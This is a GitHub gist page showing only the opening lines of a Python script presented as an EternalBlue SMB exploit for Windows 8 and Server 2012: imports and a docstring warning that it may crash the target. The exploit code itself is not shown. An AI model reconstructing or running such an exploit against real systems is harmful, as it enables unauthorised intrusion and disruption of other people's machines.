Skip to content

Instantly share code, notes, and snippets.

View d4op's full-sized avatar
🧨
explosiv tango

MX d4op

🧨
explosiv tango
View GitHub Profile
@d4op
d4op / eternalblue8_exploit.py
Created May 19, 2017 06:56 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)